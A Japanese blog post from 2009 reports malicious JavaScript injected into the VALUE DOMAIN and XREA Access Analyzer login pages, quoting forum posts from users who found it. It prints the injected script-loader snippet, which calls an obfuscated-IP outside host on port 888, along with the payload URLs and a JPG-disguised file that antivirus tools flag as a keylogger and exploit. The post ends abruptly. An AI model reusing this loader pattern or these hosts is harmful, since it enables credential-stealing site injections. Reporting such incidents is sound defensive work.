ex

VALUE DOMAINで大規模なウイルス騒動?

http://d.hatena.ne.jp/strange/20090707#p1より
http://www.mudaijp.com/wp/5596.html

VALUE DOMAINのHPの一部のページにウイルスが仕込まれてるようです。
ウイルスコードが仕込まれているページは、VALUE DOMAINのログイン画面です。

ウイルスコードはjavascriptに記述されている以下のjsを呼び出している。

http://1856317799:888/s.js

このjs中で

http:\/\/0x6EA52967:888/dir/show.php
↓
http://110.135.41.103:888/dir/show.php

さらにこういう香港割り当てのURLを呼び出しており、カスペルスキーだとキーロガーとして検出されるらしい。

VALUE DOMAINは公私ともに使いまくってるのでjavascript切って確認しにいったけど今はもう削除されてるようで見当たらなかった。

しかし、今度はアクセスアナライザーのログイン画面に
http://pc11.2ch.net/test/read.cgi/hosting/1246828727/511-514

511 :名無しさん@お腹いっぱい。:2009/07/08(水) 16:01:49 P
あ、関係ないかもしれないけど、
XREAのアクセスアナライザー ttp://ax.xrea.com/
のログイン画面で、アバスト反応した。
↓こんなんみたいだけど。
JS:CVE-2008-0015-A [Expl]
これって今回の騒動は関係ない?




512 :名無しさん@お腹いっぱい。:2009/07/08(水) 16:03:09 0
>>511
ある! 同じjsが


513 :名無しさん@お腹いっぱい。:2009/07/08(水) 16:04:14 0
うわ!マジで居る
見に行くならスクリプト切っていけよ

俺もjavascript切って見に行ってみたら・・・

<SCRIPT LANGUAGE="JAVASCRIPT">
    var js = document.createElement('script');
    js.src ="http://1856317799:888/jp.js";
    try {document.getElementsByTagName('head')[0].appendChild(js);}
    catch(exp){}
    js = null;
</SCRIPT>

ある!!!

/dir2/go.jpg 

こいつをirvineでダウンロード、terapadで開いてみると案の定jpgに偽装されたファイルが出てきた。
カスペルスキーでスキャンすると

ドン!